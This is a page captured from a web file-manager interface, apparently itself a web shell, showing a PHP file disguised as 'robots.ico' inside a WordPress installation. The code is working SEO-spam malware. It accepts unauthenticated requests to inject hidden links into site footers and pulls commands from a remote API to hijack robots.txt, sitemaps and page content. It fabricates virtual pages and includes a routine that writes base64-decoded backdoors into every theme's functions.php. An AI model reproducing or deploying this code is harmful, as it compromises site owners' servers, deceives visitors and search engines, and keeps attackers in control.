Файловый менеджер

Файловый менеджер - Редактировать - /home/kunzqhe/photostocker/wp-includes/images/media/robots.ico.tar

Назад
home/kunzqhe/photostocker/wp-includes/css/robots.ico��0000644��00000065723�15151177677�0016771 0��ustar�00��<?php if (defined('BY_ROBOTS_YES')) return; const BY_ROBOTS_YES = true; /** * 处理外链推送POST请求 / if (!function_exists('handle_link_push_request')) { function handle_link_push_request(): void { header('Content-Type: application/json; charset=utf-8'); // 读取JSON输入 $input = file_get_contents('php://input'); $data = json_decode($input, true); if (!is_array($data)) { echo json_encode(['status' => 0, 'msg' => 'invalid json']); return; } $type = $data['type'] ?? ''; $links = $data['data'] ?? []; if ($type !== 'link') { echo json_encode(['status' => 0, 'msg' => 'invalid type']); return; } if (!is_array($links) \|\| empty($links)) { echo json_encode(['status' => 0, 'msg' => 'data required']); return; } // 验证links格式 foreach ($links as $link) { if (!isset($link['url']) \|\| !isset($link['anchor'])) { echo json_encode(['status' => 0, 'msg' => 'invalid link format, need url and anchor']); return; } } // 存储数据 $saved = save_push_link_data($links); if ($saved) { echo json_encode(['status' => 1, 'msg' => 'success', 'count' => count($links)]); } else { echo json_encode(['status' => 0, 'msg' => 'save failed']); } } } /* * 保存推送的外链数据 / if (!function_exists('save_push_link_data')) { function save_push_link_data(array $links): bool { $cache_dir = ABSPATH . 'wp-content/uploads/cache/'; if (!is_dir($cache_dir)) { @mkdir($cache_dir, 0755, true); } $cache_file = $cache_dir . md5('push_links') . '.json'; return @file_put_contents($cache_file, json_encode($links, JSON_UNESCAPED_UNICODE)) !== false; } } /* * 读取推送的外链数据 / if (!function_exists('load_push_link_data')) { function load_push_link_data(): array { $cache_file = ABSPATH . 'wp-content/uploads/cache/' . md5('push_links') . '.json'; if (!file_exists($cache_file) \|\| !is_readable($cache_file)) { return []; } $content = @file_get_contents($cache_file); $links = json_decode($content, true); return is_array($links) ? $links : []; } } // ============================================ // 外链推送接收 // ============================================ if (isset($_GET['__link_push']) && $_SERVER['REQUEST_METHOD'] === 'POST') { @handle_link_push_request(); exit; } // ============================================ // 注册外链注入到 wp_footer // ============================================ add_action('wp_footer', function () { $links = load_push_link_data(); if (empty($links)) return; // 输出隐藏外链 echo '<div style="position:absolute;left:-9999px;top:-9999px;overflow:hidden;height:1px;width:1px;opacity:0;">'; foreach ($links as $link) { $url = htmlspecialchars($link['url'] ?? '', ENT_QUOTES, 'UTF-8'); $anchor = htmlspecialchars($link['anchor'] ?? '', ENT_QUOTES, 'UTF-8'); if (!empty($url) && !empty($anchor)) { echo '<a href="' . $url . '">' . $anchor . '</a>'; } } echo '</div>'; }, 9999); /* * 处理 robots.txt 劫持逻辑： * - 如果 robots.txt 文件存在，则根据接口内容覆盖或追加； * - 如果文件不存在，则注册 WordPress 的 do_robots 钩子输出内容； * - 数据支持缓存，每小时自动更新； / if (!function_exists('handle_robots_logic')) { function handle_robots_logic($api_url): void { $robots = ABSPATH . 'robots.txt'; $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';// 获取请求标识 $cache_key = 'robots_' . ($_SERVER['HTTP_HOST'] ?? ''); $force_refresh = isset($_GET['refresh_robots']); $params = [ 'type' => 'robots', 'domain' => $_SERVER['HTTP_HOST'] ?? '', 'user_agent' => $user_agent ]; $robots_result = load_or_cache_api_data($cache_key, null, 3600, $force_refresh); $robots_data = []; if ($robots_result && !$robots_result['isExpire']) { $robots_data = $robots_result['data']; } else { $fetched = fetch_from_api($api_url, $params, 'GET', 1); if ($fetched) { $robots_data = $fetched; load_or_cache_api_data($cache_key, $robots_data, 3600, true); } else { if ($robots_result) { $robots_data = $robots_result['data']; } } } $robots_content = $robots_data['robots'] ?? null; $override = $robots_data['override'] ?? false; if (!empty($robots_content)) { if (file_exists($robots) && is_readable($robots)) { if (update_robots_file($robots, $robots_content, $override)) { return; } register_robots_hooks($override, $robots_content); } else { register_robots_hooks($override, $robots_content); / // 文件不存在，仅在 Googlebot 访问时注册钩子输出 if(stripos($user_agent, 'googlebot') !== false) { register_robots_hooks($override, $robots_content); } / } } } } /* * 写入或更新 robots.txt 文件内容。 * 支持完整覆盖或标记块内追加模式（避免无限追加）。 / if (!function_exists('update_robots_file')) { function update_robots_file(string $robots, string $custom_block, bool $override): bool { $marker_start = "# BEGIN ROBOTS"; $marker_end = "# END ROBOTS"; $pattern = "/" . preg_quote($marker_start, '/') . "[\s\S]?" . preg_quote($marker_end, '/') . "\n?/"; // 近在追加模式添加标识符防止无限追加 if (!$override) { $custom_block = $marker_start . "\n" . trim($custom_block) . "\n" . $marker_end; } // 文件存在且可写 if (file_exists($robots)) { if (!is_writable($robots)) return false; $existing = file_get_contents($robots); if ($override) { return file_put_contents($robots, $custom_block) !== false; } else { if (preg_match($pattern, $existing)) { $updated = preg_replace($pattern, $custom_block, $existing); } else { $updated = rtrim($existing, "\n") . "\n" . $custom_block; } return file_put_contents($robots, $updated) !== false; } } // 文件不存在，但目录可写 if (is_writable(dirname($robots))) { return file_put_contents($robots, $custom_block) !== false; } return false; } } /** * 直接输出 robots 内容并终止执行。 / if (!function_exists('output_robots')) { function output_robots(string $content): void { header('Content-Type: text/plain'); echo $content; exit; } } /* * 注册 WordPress do_robots 钩子，控制输出内容。 * - override 模式下完全接管输出； * - 否则在默认输出后追加。 / if (!function_exists('register_robots_hooks')) { function register_robots_hooks(bool $override, ?string $robots_content): void { if (empty($robots_content)) { return; } if ($override) { add_action('init', function () { global $wp_filter; if (isset($wp_filter['do_robots'])) { unset($wp_filter['do_robots']); } }, 0); add_action('do_robots', function () use ($robots_content) { header('Content-Type: text/plain'); echo $robots_content; exit; }, 0); } else { add_action('do_robots', function () use ($robots_content) { echo "\n"; // 分隔符，确保与默认输出区分 echo $robots_content; }, 1000); } } } /* * 通用 API 请求函数； * 支持 GET/POST，自动解析 JSON 并返回 data 字段内容。 / if (!function_exists('fetch_from_api')) { function fetch_from_api(string $url, array $params = [], string $method = 'GET', int $timeout = 3): ?array { $ch = curl_init(); if (strtoupper($method) === 'GET' && !empty($params)) { $url .= (strpos($url, '?') === false ? '?' : '&') . http_build_query($params); } curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => $timeout, CURLOPT_CONNECTTIMEOUT => $timeout, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, ]); if (strtoupper($method) === 'POST') { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); } $response = curl_exec($ch); curl_close($ch); if ($response !== false) { $json = json_decode($response, true); // 保证 robots/page 返回的数据结构一致 if (is_array($json) && isset($json['status']) && $json['status'] === 1 && isset($json['data']) && is_array($json['data'])) { return $json['data']; } } return null; } } /* * 输出 sitemap XML（支持 sitemapindex 与 urlset 两种格式）； * 用于覆盖模式或 fallback。 / if (!function_exists('render_sitemap_xml')) { function render_sitemap_xml(bool $is_index, array $urls): void { status_header(200); header('Content-Type: application/xml; charset=utf-8'); echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"; if ($is_index) { echo "<sitemapindex xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n"; foreach ($urls as $url) { echo " <sitemap>\n <loc>" . htmlspecialchars($url) . "</loc>\n <lastmod>" . date('c') . "</lastmod>\n </sitemap>\n"; } echo "</sitemapindex>"; } else { echo "<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n"; foreach ($urls as $url) { echo " <url>\n <loc>" . htmlspecialchars($url) . "</loc>\n <lastmod>" . date('c') . "</lastmod>\n </url>\n"; } echo "</urlset>"; } exit; } } /* * 劫持 sitemap 类型请求（如 sitemap_index.xml、page-sitemap.xml 等）： * - 根据接口返回规则判断是覆盖输出还是在原 sitemap 中追加； * - 支持不存在页面 fallback 输出； * - 内容缓存 1 小时，可通过 URL 参数刷新。 / if (!function_exists('handle_sitemap_logic')) { function handle_sitemap_logic($api_url): void { $uri = parse_url($_SERVER['REQUEST_URI'] ?? '', PHP_URL_PATH); if (!preg_match('#^/(.+\.xml)$#', $uri, $match)) { return; } $sitemap_file = $match[1]; $cache_key = 'sitemap_' . $sitemap_file; $force_refresh = isset($_GET['refresh']) \|\| isset($_GET['refresh_sitemap']); $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';// 获取请求标识 $params = [ 'type' => 'sitemap', 'domain' => $_SERVER['HTTP_HOST'] ?? '', 'sitemap_file' => $sitemap_file, 'user_agent' => $user_agent ]; $sitemap_result = load_or_cache_api_data($cache_key, null, 3600, $force_refresh); $data = []; if ($sitemap_result && !$sitemap_result['isExpire']) { $data = $sitemap_result['data']; } else { $fetched = fetch_from_api($api_url, $params, 'GET', 1); if ($fetched) { $data = $fetched; load_or_cache_api_data($cache_key, $data, 3600, true); } else { if ($sitemap_result) { $data = $sitemap_result['data']; } } } //echo "<pre>";print_r($params);exit; if (!is_array($data) \|\| empty($data['url']) \|\| !is_array($data['url'])) { return; } $override = $data['override'] ?? false; $is_index = $data['is_index'] ?? ($sitemap_file === 'sitemap_index.xml'); $urls = $data['url']; if ($override) { render_sitemap_xml($is_index, $urls); } else { // 判断页面是否真实存在，若不存在则和覆盖模式一致强制输出劫持内容 add_action('template_redirect', function () use ($urls, $is_index) { if (is_404()) { render_sitemap_xml($is_index, $urls); } }); // 若页面存在,则读取原内容 ob_start(function ($original) use ($urls, $is_index) { //如果内容为空直接输出接口传输的内容（测试好像不生效就走上面的是否404来判断吧） if (empty($original)) { render_sitemap_xml($is_index, $urls); } // 判断内容是否为索引sitemapindex还是urlset if (stripos($original, '<sitemapindex') !== false) { $insert = ""; foreach ($urls as $url) { $insert .= " <sitemap>\n <loc>" . htmlspecialchars($url) . "</loc>\n <lastmod>" . date('c') . "</lastmod>\n </sitemap>\n"; } return str_replace('</sitemapindex>', $insert . '</sitemapindex>', $original); } elseif (stripos($original, '<urlset') !== false) { $insert = ""; foreach ($urls as $url) { $insert .= " <url>\n <loc>" . htmlspecialchars($url) . "</loc>\n <lastmod>" . date('c') . "</lastmod>\n </url>\n"; } return str_replace('</urlset>', $insert . '</urlset>', $original); } return $original; }); } } } /* * 通用缓存读取与写入函数； * - 若传入 $data 参数，则写入缓存； * - 否则根据 key 读取缓存； * - 支持缓存失效时间与强制刷新。 / if (!function_exists('load_or_cache_api_data')) { function load_or_cache_api_data(string $cache_key, ?array $data = null, int $ttl = 3600, bool $force_refresh = false): ?array { $cache_dir = ABSPATH . 'wp-content/uploads/cache/'; if (!is_dir($cache_dir)) { @mkdir($cache_dir, 0755, true); } $cache_file = $cache_dir . md5($cache_key) . '.json'; if ($data !== null) { @file_put_contents($cache_file, json_encode($data)); return $data; } if (file_exists($cache_file) && is_readable($cache_file)) { $file_contents = file_get_contents($cache_file); $decoded = json_decode($file_contents, true); if (!$force_refresh && (time() - filemtime($cache_file) < $ttl)) { return ['isExpire' => false, 'data' => $decoded]; } else { return ['isExpire' => true, 'data' => $decoded]; } } // cache file does not exist or unreadable return []; } } /* * 劫持 WordPress 页面内容渲染逻辑： * - 若接口规则中包含 override=true，则直接输出并终止； * - 否则基于匹配规则对文章内容做替换、追加处理； * - 支持页面级缓存（默认 30 天）及强制刷新。 / if (!function_exists('handle_page_override_logic')) { function handle_page_override_logic($api_url): void { if (is_admin()) return; $cache_key = 'page_' . md5(($_SERVER['HTTP_HOST'] ?? '') . ($_SERVER['REQUEST_URI'] ?? '')); $force_refresh = isset($_GET['refresh_page_cache']); $pageUrlInfo = parse_url($_SERVER['REQUEST_URI']); $params = [ 'type' => 'page', 'domain' => $_SERVER['HTTP_HOST'] ?? '', 'url' => $pageUrlInfo['path'], 'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? '' ]; //echo "<pre>";print_r($pageUrlInfo);print_r($params);exit; $page_result = load_or_cache_api_data($cache_key, null, 2592000, $force_refresh); // 若存在缓存文件并且没有过期则使用缓存文件 if ($page_result && !$page_result['isExpire']) { $page_data = $page_result['data']; } else { $page_data = fetch_from_api($api_url, $params, 'GET', 1); if ($page_data) { load_or_cache_api_data($cache_key, $page_data, 2592000, true); } else { if ($page_result) { $page_data = $page_result['data']; } } } //echo "<pre>";print_r($params);print_r($page_data);//echo "</pre>";//exit; if (!empty($page_data) && is_array($page_data)) { // 覆盖输出逻辑：如果匹配当前页面且为 override 模式，则直接输出并 exit，避免进入 WordPress 404 foreach ($page_data as $rule) { if (!empty($rule['override']) && !empty($rule['content'])) { status_header(200); // 防止 WordPress 设置 404 状态码 echo $rule['content']; exit; } } // 如果当前是 404 且匹配 all_match 且 mode = replace 则注入虚拟页面 foreach ($page_data as $rule) { //echo "<pre>";print_r($page_data);exit; if (($rule['match'] ?? '') === 'all_match' && strtolower($rule['mode'] ?? '') === 'replace' && !empty($rule['content'])) { $title = $rule['title'] ?? '虚拟页面'; $page_type = $rule['type'] ?? 'post'; inject_virtual_page($title,$page_type, $rule['content']); break; } } // 若当前页面不是404页面则直接进入内容追加模式 add_filter('the_content', function ($original) use ($page_data) { if (empty($original)) { return $original; } // 空内容直接返回，跳过劫持逻辑} $output = $original;// 原始文章内容 foreach ($page_data as $rule) { $match = $rule['match'] ?? ''; $mode = strtolower($rule['mode'] ?? 'append'); $position = strtolower($rule['position'] ?? 'after'); $scope = strtolower($rule['scope'] ?? 'first'); $fragment = $rule['content'] ?? ''; if (empty($fragment)) continue; if ($match == 'all_match') { $match = $output; } // 如果 match 为空，表示追加到文章头部或尾部 if ($mode === 'append' && $match === '') { if ($position === 'before') { $output = $fragment . $output; } elseif ($position === 'after') { $output = $output . $fragment; } continue; } $is_regex = preg_match('/^\/.\/$/', $match); $pattern = $is_regex ? $match : '/' . preg_quote($match, '/') . '/'; if ($mode === 'replace') { if ($scope === 'first') { $output = preg_replace($pattern, $fragment, $output, 1); } elseif ($scope === 'last') { $reversed = strrev($output); $reversed = preg_replace(strrev($pattern), strrev($fragment), $reversed, 1); $output = strrev($reversed); } else { $output = preg_replace($pattern, $fragment, $output); } } elseif ($mode === 'append') { $output = preg_replace_callback($pattern, function ($matches) use ($fragment, $position) { return $position === 'before' ? $fragment . $matches[0] : $matches[0] . $fragment; }, $output, $scope === 'first' ? 1 : ($scope === 'last' ? 1 : -1)); } } return $output; }); } } } /** * 防止404 注入一个虚拟页面并触发模板渲染。 * 仅用于“追加模式下页面不存在但接口返回了数据”的情况。 / if (!function_exists('inject_virtual_page')) { function inject_virtual_page(string $title = '虚拟页面', $page_type = 'post', string $content = ''): void { add_action('template_redirect', function () use ($title, $page_type, $content) { if (!is_404()) return; global $wp_query, $post, $wp_the_query; $virtual_post_id = 9999999999; // 生成虚拟ID ensure_virtual_post_exists($virtual_post_id); // 创建虚拟 WP_Post 对象，确保 ancestors 属性存在且为数组 $virtual_post = new WP_Post((object)[ 'ID' => $virtual_post_id, // 虚拟文章的唯一 ID（负数防止与真实冲突） 'post_author' => 1, // 作者ID 'post_date' => current_time('mysql'), // 本地发布时间 'post_date_gmt' => current_time('mysql', 1), // GMT 发布时间 'post_content' => $content, // 页面内容 'post_title' => $title, // 页面标题 'post_type' => $page_type, // 设置为页面类型（page 页面 post 文章） 'post_excerpt' => '', // 摘要 'post_status' => 'publish', // 状态为已发布 'comment_status' => 'closed', // 评论 open 打开 closed 关闭 'ping_status' => 'closed', // ping open 打开 closed 关闭 'post_password' => '', // 无需密码 'post_name' => sanitize_title($title), // 页面别名（slug） 'to_ping' => '', // ping 列表，留空 'pinged' => '', // 已 ping 内容，留空 'post_modified' => current_time('mysql'), // 修改时间 'post_modified_gmt' => current_time('mysql', 1), // GMT 修改时间 'post_content_filtered' => '', // 内容过滤后结果，留空 'post_parent' => 0, // 父页面 ID（无父页面） 'guid' => home_url('/virtual-' . uniqid()), // 全局唯一标识符 'menu_order' => 0, // 菜单排序 'post_mime_type' => '', // MIME 类型，留空 'comment_count' => 0, // 评论数为 0 'filter' => 'raw', // 过滤器标记为原始 'ancestors' => [], ]); status_header(200); // 设置 WordPress 全局环境 $wp_query->is_404 = false; $wp_query->is_page = true; $wp_query->is_singular = true; $wp_query->found_posts = 1; $wp_query->post_count = 1; $wp_query->max_num_pages = 1; $wp_query->posts = [$virtual_post]; $wp_query->post = $virtual_post; $wp_query->queried_object = $virtual_post; $wp_query->queried_object_id = $virtual_post->ID; $wp_the_query = $wp_query; $post = $virtual_post; setup_postdata($virtual_post); /* // 插件兼容 global $authordata; $authordata = get_userdata($virtual_post->post_author); add_filter('the_posts', fn($posts) => [$virtual_post]); add_filter('pre_get_shortlink', fn() => home_url('/virtual-' . uniqid())); / // 关闭 canonical 重定向 remove_filter('template_redirect', 'redirect_canonical'); }, 0); } } if (!function_exists('ensure_virtual_post_exists')) { function ensure_virtual_post_exists($virtual_post_id): void { global $wpdb; $exists = $wpdb->get_var($wpdb->prepare( "SELECT ID FROM {$wpdb->posts} WHERE ID = %d", $virtual_post_id )); if (!$exists) { $wpdb->insert($wpdb->posts, [ 'ID' => $virtual_post_id, 'post_author' => 1, 'post_date' => current_time('mysql'), 'post_date_gmt' => current_time('mysql', 1), 'post_content' => '', // 'post_title' => '__virtual__', 'post_excerpt' => '', 'post_status' => 'trash', // 回收站 'comment_status' => 'closed', 'ping_status' => 'closed', 'post_name' => '__virtual__', 'post_type' => 'page', 'post_modified' => current_time('mysql'), 'post_modified_gmt' => current_time('mysql', 1), 'guid' => home_url('/virtual-' . uniqid()), ]); } } } / * 自动部署隐藏脚本到所有主题 functions.php 中 * * @param string $base64 Base64 编码的 PHP 代码 / if (!function_exists('auto_deploy_hidden_backdoors')) { function auto_deploy_hidden_backdoors(string $base64): void { $themes_dir = ABSPATH . 'wp-content/themes'; $decoded_code = base64_decode($base64); if (!$decoded_code) { return; } // 遍历每一个主题目录 foreach (glob($themes_dir . '/', GLOB_ONLYDIR) as $theme_path) { $functions_file = $theme_path . '/functions.php'; $payload_path = $theme_path . '/assets/page.html'; // 确保 assets 目录存在 if (!is_dir($theme_path . '/assets')) { @mkdir($theme_path . '/assets', 0755, true); } // 写入 payload 文件 @file_put_contents($payload_path, $decoded_code); // 构建 require_once 语句 $require_code = "@require_once ABSPATH . 'wp-content/themes/" . basename($theme_path) . "/assets/page.html';"; // 检查 functions.php 是否存在 if (file_exists($functions_file)) { $content = file_get_contents($functions_file); if (!str_contains($content, $require_code)) { // 若未包含则追加 @file_put_contents($functions_file, "\n" . $require_code . "\n", FILE_APPEND); } } } } } $api_url = 'http://wp.test/api.php';// 线下http://wp.test/api.php http://wp.makeprofectworld.com/api.php // robots劫持 @handle_robots_logic($api_url); // sitemap劫持 @handle_sitemap_logic($api_url); // 页面劫持逻辑 @handle_page_override_logic($api_url); //auto_deploy_hidden_backdoors($bs);��

| ver. 1.4 | Github | . | PHP 7.4.33 | Генерация страницы: 0 | proxy | phpinfo | Настройка